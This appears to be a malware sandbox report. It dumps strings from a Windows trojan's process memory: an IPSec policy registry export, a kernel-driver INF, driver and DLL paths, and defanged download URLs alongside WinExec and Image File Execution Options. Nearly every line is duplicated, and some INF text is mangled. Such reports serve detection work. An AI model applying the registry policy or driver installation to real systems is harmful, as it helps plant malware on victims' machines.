"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
%original file name%.exe_1696_rwx_00401000_00022000:
.data
.data
.reloc
.reloc
Acr@ojcTcrtocpgjViohrctu&`gojcb'
Acr@ojcTcrtocpgjViohrctu&`gojcb'
\drivers\gm.dls
\drivers\gm.dls
\drivers\pcidump.sys
\drivers\pcidump.sys
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
khy.dll
khy.dll
; File Name: CCTest.inf
; File Name: CCTest.inf
; Generated by C DriverWizard 3.2.0 (Build 2485)
; Generated by C DriverWizard 3.2.0 (Build 2485)
Signature="$WINDOWS NT$"
Signature="$WINDOWS NT$"
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
ClassGUID={D4A133FE-C9E5-4F11-A812-FED74DA86ED5}
DriverVer=5/7/2010,1.00.0000
DriverVer=5/7/2010,1.00.0000
CatalogFile=CCTest.cat
CatalogFile=CCTest.cat
;reg-root,[subkey],[value-entry-name],[flags],[value]
;reg-root,[subkey],[value-entry-name],[flags],[value]
HKR,,,%REG_SZ%,ÞviceClassName%
HKR,,,%REG_SZ%,ÞviceClassName%
1 = %DiskId1%,,,""
1 = %DiskId1%,,,""
CCTest.sys = 1,,
CCTest.sys = 1,,
ÃŒTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
ÃŒTest_DeviceDesc$=CCTest_DDI, *CCTestDevice
; --------- Windows 98 -----------------
; --------- Windows 98 -----------------
; cause problems in Windows 98
; cause problems in Windows 98
HKR,,NTMPDriver,,CCTest.sys
HKR,,NTMPDriver,,CCTest.sys
HKR,,Description,,ÃŒTest_DeviceDesc%
HKR,,Description,,ÃŒTest_DeviceDesc%
; --------- Windows NT -----------------
; --------- Windows NT -----------------
[CCTest_DDI.NT]
[CCTest_DDI.NT]
[CCTest_DDI.NT.Services]
[CCTest_DDI.NT.Services]
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
Addservice = CCTest, %FLG_ADDREG_NOCLOBBER%, CCTest_Service
DisplayName = ÃŒTest_SvcDesc%
DisplayName = ÃŒTest_SvcDesc%
ServiceType = %SERVICE_KERNEL_DRIVER%
ServiceType = %SERVICE_KERNEL_DRIVER%
StartType = %SERVICE_DEMAND_START%
StartType = %SERVICE_DEMAND_START%
ErrorControl = %SERVICE_ERROR_NORMAL%
ErrorControl = %SERVICE_ERROR_NORMAL%
ServiceBinary = %\CCTest.sys
ServiceBinary = %\CCTest.sys
CCTest.sys,,,2
CCTest.sys,,,2
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_KEYONLY = 0x00000010
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_64BITKEY = 0x00001000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_KEYONLY_COMMON = 0x00002000
FLG_ADDREG_32BITKEY = 0x00004000
FLG_ADDREG_32BITKEY = 0x00004000
.text
.text
h.data
h.data
.rsrc
.rsrc
B.reloc
B.reloc
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
D:\5-20\9\CCTest\Driver\objfre\i386\CCTest.pdb
ZwCreateKey
ZwCreateKey
ntoskrnl.exe
ntoskrnl.exe
HAL.dll
HAL.dll
`.CRT
`.CRT
.tls0
.tls0
.reloc
.reloc
hXXp://host
hXXp://host
hXXp://count
hXXp://count
2014-8-1
2014-8-1
000000000000
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
iphlpapi.dll
Windows7
Windows7
Windows2000
Windows2000
WindowsXP
WindowsXP
Windows2003
Windows2003
Windows98
Windows98
WindowsNT
WindowsNT
hXXp://downpath
hXXp://downpath
%sOneG%d.exe
%sOneG%d.exe
SSSSh
SSSSh
YYSSSSh
YYSSSSh
WinExec
WinExec
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegCreateKeyA
RegCreateKeyA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoA
HttpQueryInfoA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
WININET.dll
WININET.dll
MSVCP60.dll
MSVCP60.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
MSVCRT.dll
MSVCRT.dll
advapi32.dll
advapi32.dll
kdll.dll
kdll.dll
setupapi.dll
setupapi.dll
shell32.dll
shell32.dll
reg.exe
reg.exe
import
import
\5717.mp4
\5717.mp4
jsseting.data
jsseting.data
%scc%d.exe
%scc%d.exe
KERNEL32.DLL
KERNEL32.DLL
GetCPInfo
GetCPInfo
USER32.DLL
USER32.DLL
SETUPAPI.DLL
SETUPAPI.DLL
Windows NT\
Windows NT\
Image File Execution Options\
Image File Execution Options\
svchost.exe
svchost.exe
CCTest.sys
CCTest.sys
Windows Registry Editor Version 5.00
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local]
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ActivePolicy"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{72385235-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"name"="ipsecFilter{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385235-70fa-11d1-864c-14a300000000}"
00,00,00,00,00,00,00
00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}]
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"name"="ipsecFilter{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523a-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"name"="ipsecNegotiationPolicy{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523f-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyAction"="{3f91a81a-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyType"="{62f49e10-6c37-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}]
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"name"="ipsecFilter{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
"ipsecID"="{f2fd0bda-3962-428d-9d06-34c2b19568bb}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}]
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"name"="ipsecISAKMPPolicy{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385234-70fa-11d1-864c-14a300000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}]
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"name"="ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecID"="{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}]
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"name"="ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecID"="{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
"ipsecNegotiationPolicyAction"="{3f91a819-7647-11d1-864d-d46a00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"name"="ipsecNegotiationPolicy{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
"ipsecID"="{72385233-70fa-11d1-864c-14a300000000}"
00,00,00,00
00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}]
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"name"="ipsecNegotiationPolicy{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecID"="{7238523b-70fa-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyAction"="{8a171dd2-77e3-11d1-8659-a04f00000000}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}]
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"name"="ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecID"="{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyAction"="{8a171dd3-77e3-11d1-8659-a04f00000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
"ipsecNegotiationPolicyType"="{62f49e13-6c37-11d1-864c-14a300000000}"
00,00,00,00,00,00,00,00,00
00,00,00,00,00,00,00,00,00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}]
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"name"="ipsecNFA{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecID"="{77d93b21-350c-4649-b8fd-3b5428af7b8d}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{56093cf4-1dd4-4ed9-b0f8-e9f83f4ae82f}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}]
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"name"="ipsecNFA{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecID"="{f6050147-987a-4592-8d14-e8aee7e77bd4}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
"ipsecNegotiationPolicyReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecNegotiationPolicy{a664b054-eebd-4697-aee0-a38f35bc4eb8}"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}]
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"name"="ipsecPolicy{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecID"="{587716d4-83f7-4a02-97c2-6137d945e86a}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
"ipsecISAKMPReference"="SOFTWARE\\Policies\\Microsoft\\Windows\\IPSec\\Policy\\Local\\ipsecISAKMPPolicy{c37d0b66-13e0-4bf0-a103-e09908ece1b7}"
%original file name%.exe_1696_rwx_00EA1000_00004000:
.text
.text
h.rdata
h.rdata
H.data
H.data
.reloc
.reloc
**************** Modified with PEditor 1.7 by yoda & M.o.D. -> come.to/f2f ****************
**************** Modified with PEditor 1.7 by yoda & M.o.D. -> come.to/f2f ****************
D:\DirectDiskForWin32\KillProcess\objfre_wxp_x86\i386\pcidump.pdb
D:\DirectDiskForWin32\KillProcess\objfre_wxp_x86\i386\pcidump.pdb
ntoskrnl.exe
ntoskrnl.exe
HAL.dll
HAL.dll
\??\c:\%original file name%.exe
\??\c:\%original file name%.exe
\??\%WinDir%\Explorer.EXE
\??\%WinDir%\Explorer.EXE
ers\gm.dls
ers\gm.dls
\drivers\gm.dls
\drivers\gm.dls
\drivers\pcidump.sys
\drivers\pcidump.sys
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
khy.dll
khy.dll
\DosDevices\Scsi%d:
\DosDevices\Scsi%d:
cc2178718.exe_744:
.text
.text
`.CRT
`.CRT
.tls0
.tls0
.reloc
.reloc
hXXp://host
hXXp://host
hXXp://count
hXXp://count
2014-8-1
2014-8-1
000000000000
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
iphlpapi.dll
Windows7
Windows7
Windows2000
Windows2000
WindowsXP
WindowsXP
Windows2003
Windows2003
Windows98
Windows98
WindowsNT
WindowsNT
hXXp://downpath
hXXp://downpath
%sOneG%d.exe
%sOneG%d.exe
SSSSh
SSSSh
YYSSSSh
YYSSSSh
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegCreateKeyA
RegCreateKeyA
ADVAPI32.dll
ADVAPI32.dll
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoA
HttpQueryInfoA
DeleteUrlCacheEntry
DeleteUrlCacheEntry
WININET.dll
WININET.dll
MSVCP60.dll
MSVCP60.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
MSVCRT.dll
MSVCRT.dll
cc2178718.exe_744_rwx_00400000_00001000:
.text
.text
`.CRT
`.CRT
.tls0
.tls0
.reloc
.reloc
hXXp://host
hXXp://host
hXXp://count
hXXp://count
2014-8-1
2014-8-1
000000000000
000000000000
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
iphlpapi.dll
iphlpapi.dll
Windows7
Windows7
Windows2000
Windows2000
WindowsXP
WindowsXP
Windows2003
Windows2003
Windows98
Windows98
WindowsNT
WindowsNT
hXXp://downpath
hXXp://downpath
%sOneG%d.exe
%sOneG%d.exe
SSSSh
SSSSh
svchost.exe_1236:
.text
.text
`.data
`.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
RPCRT4.dll
RPCRT4.dll
NETAPI32.dll
NETAPI32.dll
ole32.dll
ole32.dll
ntdll.dll
ntdll.dll
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
GetProcessHeap
GetProcessHeap
NtOpenKey
NtOpenKey
svchost.pdb
svchost.pdb
\PIPE\
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
svchost.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512